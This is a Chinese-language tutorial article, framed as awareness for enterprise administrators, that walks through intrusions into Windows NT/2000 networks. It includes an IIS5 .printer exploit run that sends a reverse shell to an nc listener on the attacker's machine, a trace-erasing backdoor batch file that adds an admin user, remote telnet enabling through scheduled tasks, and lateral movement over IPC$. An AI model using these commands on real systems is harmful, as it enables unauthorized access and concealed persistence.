此篇文章并非小弟原创,原作者已不可考,它是我网管笔记的一部份分享给有需要的人
骇客入侵手法分析(一)
管理员密码的泄漏
我们知道,所谓骇客的入侵,通常是同网路管理员权限泄漏相关连的。一个骇客的入侵行为,只有当他掌握的网路管理员权限的时候才是有意义的。而管理员的权限又和管理员密码紧密相关,可以说,管理员密码证明着管理员的权限。正因为这样,管理员密码的争夺,永远是"骇客"与"反骇客"大战中永远不会平息的话题。
在这里要介绍的,是关于微软NT系统的安全性问题。NT系统的确是非常适合企业使用的操作系统。然而,由于微软自己对产品的所产生的缺失,NT也是一个充满不安和脆弱的系统。如果企业的系统管理员没有清楚的认识这一点,甚至没有想过基本的安全性问题,那么,必然会带来许多不可估计的问题。 首先,我们就从NT系统的管理员密码开始讲起。
电脑技术发展到今天,进步已经不是当初的人们可以想象得到的。可是在这么多年的发展中,电脑安全的关键还只是寄重任于一个脆弱的小小东西,这个东西我们称为"密码"(password)。当它一旦被攻破,安全就很难保障。而许多"骇客"的主要任务,就是想方法的找到这个关键的东西,以便他们可以得到他们想要的权限去做他们想做的事情。
那他们有些什么办法来获得这个关键呢?
一. 猜+解:
对付一些未知的事情最直接的方法就是猜吧。不过猜也有技巧,有的是不管三七二十一强来,我们管它叫"穷举法"﹔有的是利用人们常习惯用的密码做为猜解的根据,这就是称为"字典"的东东啦。这些手法,利用的都是电脑强大的处理能力和极快速的处理速度来达成的。而且随着电脑技术的发展,运算速度几何数级的增长,这种猜解的成功率也大大的提高了。拿六个字符长度密码做"穷举法"的例子吧,486机器可能需要耗时一整天才可能猜解出来﹔而目前的400Mhz的机器可能不用一个小时就做到了。如果再加上有效的字典的话,那真的可以说是无往而不利了。据说目前的有的骇客字典甚至已经函盖了整个牛津字典,各种人名,到1800到2003年的所有日期……呵呵,"渔翁撒网,避无可避"呀!
谈了这么多的密码猜法,当然要谈一下如何保护自己的密码不被破解,请遵守以下的原则:
◎ 不用生日作为密码(太容易猜了)
◎ 不用序数作为密码(除非您的序数无限大)
◎ 不用身份证字号作为密码(身份证号码太规则了)
◎ 不用在字典中查得到的单词作为密码(刚才已经说了)
依照上面的几点说法,什么样子的密码最不容易猜,自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码,例如:WoBuPaNi 就是一个很难猜的密码类型,基于这个密码猜法的原则,您的密码是不是要作些更新或是大小写要作一些对调 ?? 如果您的密码是henhao,建议您最好能改成HenHao,这样被猜中的机率就小了很多。
二.利用系统漏洞:
通常一个高强度的密码已经可以让许多的"骇客"断羽而归。然而这也不完全是安全的,一些致命的系统漏洞往往会成为更为方便的"后门"。这就好比是一个脆弱的链条上挂了一把坚强的锁。锁本身是够强了,别人怎么也打不开﹔可是炼条却太脆弱了,经不起折腾,一下就给人橇开了。
举个例子说吧,早些日子发现的微软的IIS 5.0的.printer ISAPI延伸远程缓冲区溢出漏洞就是一个很致命的漏洞。"骇客"可以利用这个漏洞做任何的东西。当然也包括"开锁"了。
在一个企业中,往往直接连接Internet的是WEB服务器,而一个有耐性的"骇客",一个想入侵这个企业的商业间谍当然会不惜一切手段入侵,其中一个手法就是利用WEB服务。预设值情况下,IIS 5.0服务器存在一个连接为"printer"的应用程式映射,这个映射使用位于\WINNT\System32\下的名为 msw3prt.dll 的动态库档案。这个功能是用于基于Web控制的网路印表机的,是Windows2000为Internet Printing Protocol(IPP)协议而设置的应用程式功能。不幸的是,这个映射存在一个缓冲区溢出错误,可以导致inetinfo.exe出错,允许骇客通过web获取服务器的管理权限,骇客制造一个 .printer 的ISAPI请求,当Http host参数的值达到420个字符时,就会发生缓冲区溢出。请求的结构如下:
GET /NULL.printer HTTP/1.0
Host: [buffer]
当上述 [buffer]值的字符数目达到420时,缓冲区溢出。
这时,Web Server会停止回应。Windows2000操作系统发现Web异常停止后,会自动重新启动,因此系统管理员很难意识到发生过攻击。并且由于它可以重新启动,所以骇客可以不止一次的利用它来得到shell。通过构造包含适当的Shell Code的脚本, 骇客可以以system用户的身份,不停地远程通过web执行任何指令。目前Internet上已经有一个exploit程式,可以连接系统的cmd.exe程式,从而自由地执行指令。
下面我们示范这个漏洞如何使得"骇客"可以绕过密码这个关口,得到管理员权限。
先到网上DownLoad一个IIS5Exploit骇客程式包《大陆知名漏洞搜寻及程式着作-小榕》,里面包括有NC.EXE;IIS5Exploit.EXE两个程式。以下的步骤在IIS5Exploit的说明文件里有详细解释:
1、首先在本机用NC开一个监听端口。
C:\>nc -l -p 99
2、执行IIS5Exploit
D:\>IIS5exploit 待入侵机器IP 本地机器IP 99
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001.
http://www.netX...om===Connecting xx.xx.xx.xx ...OK.
Send Shell Code ...OK
IIS5 Shell Code Send OK
稍等片刻,如果成功在本机NC登录的端口出现:
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
可以执行命令。如:
C:\>net user test 123 /add
The command completed successfully.
C:\>net localgroup administrartors test /add
这样就建立了一个属于Administrator组的用户test,密码为123。
所以为了杜绝这些脆弱的"炼条",NT的系统管理员必须得及时为自己得系统增改修正程式,堵住这些漏洞。
骇客入侵手法分析(二)
获得管理员权限后的初级和高级入侵
在上一节中阐述了"骇客"取得管理员权限的一些典型手段。那么究竟"骇客"得到了NT的管理员权限之后能做什么呢?
有人也许会说:"得到了NT的管理员权限还能做什么,想做什么就做什么咯!"但到底能做什么呢?能详细答出来的只怕不会很多,而且很多企业系统管理员就认为没什么,因为他们压根就不知道"骇客"会怎么做。本文介绍的就是得到NT的管理员密码以后入侵一个企业电脑群的初级和高级手法。从这里可以看出,在一个企业中,尤其是在一个大型企业当中,企业系统管理员的密码失窃往往关系着整个公司的信息泄密,以及公司的数据的丢失,严重的影响到一个企业的发展和生存。
首先,我们先假定已经得到了某个企业的一台服务器192.168.0.1的administrator的密码,而对方没有关闭139端口。这样我们可以有以下几种层次不同的入侵方式:
一.普通共享资源的入侵
这种入侵手法可说是NT最简单的入侵了,随便在自己机器的哪个窗口的地址栏里输入"\\192.168.0.1"大概等1-2秒,对方就会要求您输入用户名和密码,输入所得到的用户名和密码以后就可以进入,并可以看到这台服务器在企业中的共享资源了。
由于权限是admin,所以您几乎可以删除对方共享资源里的任何东西(当然如果设置了共享为唯读那就没办法了)。这种手法虽然也有一定的危害性,但是究竟是最初级的入侵方式,为害的范围还小。
二.预设及隐藏共享资源的入侵
在说这种入侵方法之前,我先来给大家介绍一下什么叫做NT的IPC$连接共享:IPC$是专门用在NT中的一种管道通讯方式,NT系统之间的通讯大部分都是在IPC$通讯中完成的﹔在预设情况下,NT系统都有一个特殊的隐藏共享,那就是IPC$共享了。
这种的入侵手法相对高明一点,但还是很简单的,不过关键还是要看"骇客"如何利用了,有的人可能只能删删文件,有的人却可以利用这个留下后门,以便下次如果密码改变了后可以利用后门进入。同样在机器里随便打开一个窗口,在地址栏输入"\\192.168.0.1"就会要求输入密码,输入以后所看到的东西和前面介绍的一样,好现在同时也建立好IPC$连接了。然后我们再次在地址栏输入地址,这次输入的就有点不同了,输入"\\192.168.0.1?c$"大概过一会就出现了对方C槽里所有的内容了。嘿嘿!想看对方D槽?同样,输入"\\192.168.0.1\D$"就看见对方D槽了。然后想换这个企业的主页(假如对方还是一个WEB服务器)可说是轻而易举,记住由于权限是管理员当然可以写了,留不留后门就看"骇客"的想法,一般他们会在C槽(假设在c:\winnt下)建立一个批次档,假设档名为test.bat,其内容一般为:
net user test 123 /add //建立一个用户名为test的用户密码为123
net localgroup administrators test /add //让test也是管理员
del C:\Documents and Settings\administrator\「开始」\程式集\启动\test.lnk //删除启动文件夹里的快捷列消除足迹
del c:\winnt\test.bat //删除test.bat这个档案消除足迹
这样当企业系统管理员在下次登陆时,系统就会偷偷的添加一个用户test了。当然其实添加用户算是一个比较愚蠢的留"后门的方法了,所以其实很多"骇客"会放一个可以常驻记忆体的小程式,然后建立一个类似的批次档和快捷列,那么"骇客"基本上可以长期的占有企业中的这台主机了。
三.IPC$连接入侵的高级手段
然而每个"骇客"都不可能那么笨,非要一直等到下次企业系统管理员登陆以后才可以占有,往往"骇客"会使用更加巧妙的手法,迅速的留下后门。首先他们还是先建立IPC$连接,连接以后他们会使用各种手法开后门,比如打开telnet服务。"骇客"怎么打开telnet服务呢?其实有很多种方法,比如可以利用小榕"流光"里所提供的开telnet服务的小程式Srv.exe。"骇客"只要把它上传到刚才的那个主机去,再利用时间任务执行它就可以了。就像这样子: D:\>copy srv.exe \\192.168.0.1\admin$ //先复制srv.exe上去,在流光的Tools目录就有。
D:\>net time \\192.168.0.1 //192.168.0.1 的目前时间是 2001/1/17 上午 10:48
D:\>at \\192.168.0.1 10:50 srv.exe //在时间表增加任务执行程式
D:\>net time \\192.168.0.1 //再查查够时间没有
D:\>telnet 192.168.0.1 99 //telnet上要入侵的主机去,Srv利用的是99端口
出现如下提示:
Microsoft Windows 2000
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
成功了!
当然,由于Srv本身属于非NT系统的程式,像这样子打开telnet服务必然会引起管理员的警觉。最好的方式就是利用NT系统本身的telnet服务程式。现在既然已经可以远程登陆到入侵机器了,要启动它也不难。像这样:
C:\WINNT\system32>net start telnet
不过,启动还是不成功的,需要NTLM验证,这下又把"骇客"拦在了外面了。可是这难不到"骇客"们,这时他们又会用到一个小程式了,就是专门关闭一个NTLM验证的程式ntlm.exe。(当然也可以是其他名字)"copy ntlm.exe \\192.168.0.1\admin$\system32"把ntlm.exe复制到对方企业服务器的system32目录下。复制过去了,同样利用往时间表增加任务的形式来启动它,然后再用telnet登录,成功!这回是提示需要输入用户和密码了,输入所得到的管理员用户名和密码以后就成功的telnet到了企业服务器……
不过这样一下是net time;一下又是at实在是麻烦,现在就介绍另一个方法,首先还是先感谢微软为NT系统管理员提供的方便的管理功能,这一功能到了"骇客"手中可说是"骇客"的福音,不用"骇客"再这么麻烦的输入这样那样的命令了。建立好IPC$连接以后(IPC$连接果然是一种功能非常强大的管理连接),打开本地电脑里的"系统管理工具",用滑鼠右键点电脑管理窗口里的"电脑管理(本地)"里面有"连线到另一台电脑"选择它,在"名称"里输入"192.168.0.1"确定以后,首先您的NT系统会看是否建立IPC$连接,"有"就连接上去了,现在您就可以直接管理192.168.0.1了,比如看他的日志,启动他的服务(当然包括telnet了),管理他的IIS,什么都有。多研究一下,连注销对方系统当前登陆的用户,重新启动对方电脑,关闭对方电脑都有。NT系统到了"骇客"手中,整个系统都成了一个"骇客"工具了,而且是功能非常强大的"骇客"工具。
看了以上文章现在那些安全意识差的企业系统管理员们知道了曝露了管理员密码的危险性了吧?
骇客入侵手法分析(三)
危险,入侵的深入!
通过上面两篇文章的介绍,我们已经成功的把一台企业的服务器搞到手了。这里面当然有系统管理员的"贡献"^_^,那么我们来看看,除了能得到这台服务器之外,"骇客"还能不能得到其他的东西?
"骇客"们当然不会仅仅在攻陷一台服务器以后就立刻罢手的,入侵更深层次的机器永远是他们不懈追逐的目标。他们会尝试深入入侵您的内网,尤其是在一个企业中,往往都是电脑群,那些商业间谍"骇客"当然就更加的想入侵到企业内部去了。而很多企业系统管理员喜欢把所有的服务器的密码设为相同,就更给"骇客"提供了一个良好的入侵条件。telnet到对方服务器以后,输入"net view"企业中整个一个工作组或网域的电脑这时都一展无遗。同样在telnet里建立IPC$连接以后像入侵这台服务器一样的入侵了,前面说的建立IPC$连接都是使用的图形界面,然而这时候已经不再拥有图形界面了,现在假设企业内网的192.168.0.2的密码和这台服务器密码相同,这时可以使用
net use \\192.168.0.2\IPC$ "passwd" / user:username
来建立IPC$连接,然后是映射驱动槽,输入
net use z: \\192.168.0.2\c$
这样就把192.168.0.2的C槽映射到192.168.0.1的Z槽去了。输入"z:"就可以象浏览192.168.0.1的硬碟一样,浏览192.168.0.2的C槽。而如果他是商业间谍"骇客",一旦发现里面有价值的东西自然不用说将来会发生什么事了。
当然这往往还算是最理想的条件,其实还是有相当一部分企业系统管理员不会把密码设为一样的。现在就看网路的具体情况了,如果入侵的正好是一台主网域控制器,那么在"骇客"升级成网域管理员后,整个企业的一个网域的机器都落在了他的手中了。
另外就是通过IIS的管理入侵,在预设情况下IIS提供一个WEB方式的管理服务,在c:\inetpub\wwwroot里有一个叫iisstar.asp的东西,如果可以访问,而且有管理员密码(NT4里不是管理员也可以,只要是NT的合法帐号)就可以远程通过WEB方式管理IIS信息服务,然后通过特殊手法进一步控制整个机器,然后是整个企业……
如果内部网的电脑是服务器当然不必说了,由于服务器的特点就是要打开合法的端口来侦听服务请求,所以被入侵的机会更大。但即便只是工作站客户机,占领了服务器的骇客也可以通过NT的一些漏洞入侵进去,然后再利用机器之间的信任关系进行活动。如果是商业间谍甚至还有可能安装sniff(嗅探器)监视整个企业的数据传送情况以及内容、通过电子邮件传送木马等各种途径来得到企业内部的敏感信息或保密信息。
当然入侵内网的机会的大小往往也是根据"骇客"的经验的多少来决定的。不过微软的产品有太多的漏洞,而且有许多还往往是致命的,这使得即便是一个不怎么高明的骇客,在利用这些漏洞之后也能很轻易的入侵。这就加大了骇客入侵服务器,和更深入的入侵内网的机会。
从以上的阐述中,企业的系统管理员应该明白,加强网路安全意识,刻不容缓啊!
